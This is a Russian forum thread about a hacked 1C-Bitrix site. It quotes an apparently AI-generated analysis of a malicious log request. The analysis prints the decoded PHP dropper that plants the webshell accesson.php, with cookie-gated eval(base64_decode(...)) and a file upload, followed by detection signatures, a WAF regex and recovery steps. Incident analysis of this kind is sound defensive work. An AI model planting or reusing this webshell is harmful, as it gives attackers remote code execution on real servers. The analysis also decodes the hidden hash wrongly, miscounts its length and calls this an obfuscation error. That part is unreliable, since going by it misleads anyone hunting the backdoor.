Взлом BitrixBM - не удаляйте тему пожалуйста, ситуация критическая .

Алексей, лучше сразу обратитесь в техподдержку.

вот что  ИИ выдал по этому поводу

# Анализ и декодирование вредоносного GET-запроса в логах сервера

В ходе исследования подозрительного GET-запроса, обнаруженного в логах взломанного сервера, был проведен комплексный анализ структуры запроса и содержащегося в нем кода. Запрос демонстрирует признаки целенаправленной атаки на системы управления контентом с использованием техник обфускации и эксплуатации уязвимостей.

## Структура запроса и первичное декодирование

Исходный запрос содержит URL-encoded строку в параметре `midog`:
```http
GET /?midog=%24s%3D%24_SERVER[...] HTTP/1.1
```
Применение стандартного URL-декодирования с использованием `urllib.parse.unquote` в Python позволяет раскодировать основные компоненты запроса:
```php
$s=$_SERVER['DOCUMENT_ROOT'].'/';
$s1=$s.'bitrix/admin/';
$fh=fopen($s1.'accesson.php','w');
fwrite($fh,'<?php echo 409723*20;if(md5($_COOKIE["d"])=="\61\x37\60\62\x38\146\x34\70\67\143\142\x32\141\70\x34\x3­6\x30\67\x36\64\x36\x64\141\63\141\144\63\70\67\x38\145\143"­){echo"\x6f\x6b";eval(base64_decode($_REQUEST["id"]));if($_POST["\165\160"]=="\165\x70"){@copy($_FILES["\x66\151\x6c\x65"]["\164\155\x70\x5f\x6e\x61\x6d\x65"],$_FILES["\146\x69\154\x65"]["\156\141\155\x65"]);}}?>
');
fclose($fh);
```

## Анализ PHP-кода

### Создание вредоносного файла
Код создает файл `accesson.php` в директории `/bitrix/admin/`, что характерно для атак на системы управления типа 1С-Битрикс. Файл содержит многоуровневую систему проверок и функций:

1. **Математическая операция** `409723*20` служит для имитации легитимной активности и проверки работоспособности скрипта
2. **Проверка MD5-хеша** cookie-параметра "d":
```php
md5($_COOKIE["d"])=="\61\x37\60\62\x38\146\x34\70\67\143\142\x32\141\70\x34\x3­6\x30\67\x36\64\x36\x64\141\63\141\144\63\70\67\x38\145\143"­
```
Декодирование строки с использованием комбинации octal и hex-последовательностей дает значение:
```
a17028f487cb2a846306464da3ad3878ec
```
Однако фактическая длина полученной строки (37 символов) превышает стандартный 32-символьный MD5-хеш, что указывает на ошибку в обфускации.

### Механизм выполнения кода
При успешной проверке cookie активируется цепочка выполнения:
```php
eval(base64_decode($_REQUEST["id"]))
```
Этот механизм позволяет:
- Выполнять произвольный код через параметр `id`
- Использовать base64 для обхода простых сигнатур
- Работать с любым типом HTTP-запроса (GET, POST и т.д.)

### Функционал загрузки файлов
Дополнительная проверка:
```php
if($_POST["\165\160"]=="\165\x70")
```
где `\165\160` и `\165\x70` декодируются в "up", активирует функцию копирования файлов:
```php
@copy($_FILES["\x66\151\x6c\x65"]["tmp_name"], $_FILES["\146\x69\154\x65"]["name"])
```
Расшифровка имен параметров:
- `\x66\151\x6c\x65` → "file"
- `\146\x69\154\x65` → "file"

Это реализует механизм загрузки файлов на сервер через POST-запросы с использованием Web-шелла.

## Тактико-технические характеристики атаки

### Целевая платформа
- Системы управления на базе 1С-Битрикс
- Веб-серверы с разрешенной записью в корневую директорию
- Серверы с некорректными настройками прав доступа

### Методы обфускации
1. **Комбинированное кодирование**:
  - URL-encoding для передачи payload
  - Смешанное octal/hex-кодирование строк
  - Использование escape-последовательностей

2. **Динамическая генерация путей**:
```php
$s = $_SERVER['DOCUMENT_ROOT'].'/';
$s1 = $s.'bitrix/admin/';
```
Позволяет адаптироваться к различным конфигурациям сервера

3. **Ложные сигнатуры**:
  - Математические операции в открытой части кода
  - Использование стандартных имен переменных ($s, $s1)

### Механизмы persistence
- Создание постоянного Web-шелла в системной директории
- Использование cookie-авторизации для доступа
- Возможность удаленного выполнения кода

## Рекомендации по обнаружению и предотвращению

### Сигнатуры для обнаружения
1. HTTP-запросы, содержащие:
  - Параметр `midog` с URL-encoded PHP-кодом
  - Cookie с именем "d" и 32-символьным значением
  - Параметр "id" с base64-данными

2. Файловые сигнатуры:
  - Файлы `accesson.php` в директориях `/bitrix/admin/`
  - Наличие строк `eval(base64_decode(` в PHP-файлах

### Защитные меры
1. **Конфигурационные**:
  - Запрет записи в системные директории
  - Ограничение прав доступа для PHP-процессов
  - Регулярное обновление CMS и компонентов

2. **Мониторинг**:
  - Анализ нестандартных запросов к админ-панелям
  - Контроль создания новых файлов в системных директориях
  - Логирование операций файловой системы

3. **Технические**:
  - Реализация WAF с правилами для обнаружения:
    ```regex
    /\$_(REQUEST|GET|POST)\.*?base64_decode/
    ```
  - Использование систем контроля целостности файлов
  - Регулярный аудит активных Web-шеллов

## [Анализ вектора атаки

### Этапы эксплуатации
1. **Первичный доступ**:
  - Через уязвимости в компонентах CMS
  - Межсайтовый скриптинг (XSS)
  - SQL-инъекции

2. **Установка бекдора**:
  - Создание файла accesson.php
  - Настройка каналов удаленного доступа

3. **Эскалация привилегий**:
  - Использование функций копирования файлов
  - Модификация системных конфигураций

4. **Долгосрочное присутствие**:
  - Установка дополнительных скриптов
  - Кражу учетных данных
  - Организация командного центра

### Цели атаки
1. Кража конфиденциальных данных
2. Организация DDoS-атак
3. Распространение вредоносного ПО
4. Криптовалютный майнинг
5. Шантаж и вымогательство

## Восстановление после инцидента

### Неотложные меры
1. Изоляция зараженного сервера
2. Анализ временных рамок атаки
3. Проверка целостности системных файлов
4. Смена всех учетных данных

### Долгосрочные меры
1. Реализация системы резервного копирования
2. Внедрение SIEM-систем
3. Регулярное обучение персонала
4. Пентест и аудит безопасности

## Заключение

Проведенный анализ демонстрирует сложный многоэтапный характер атаки, использующей сочетание методов социальной инженерии и технических уязвимостей. Обнаруженный payload представляет серьезную угрозу для информационной безопасности, требующую комплексного подхода к нейтрализации. Ключевыми аспектами защиты становятся постоянный мониторинг, своевременное обновление систем и многоуровневая верификация пользовательских запросов.

Александр огромнейшее спасибо, значит я не ошибся и интуитивно меры принял верный, заморозил все папки на удаление и добавление файлов, обернул все запросы GET и POST , буду создавать 3й фильтр с дополнительной информацией.  ПРОСТО СПАС...    всего доброго.

Совсем другое дело..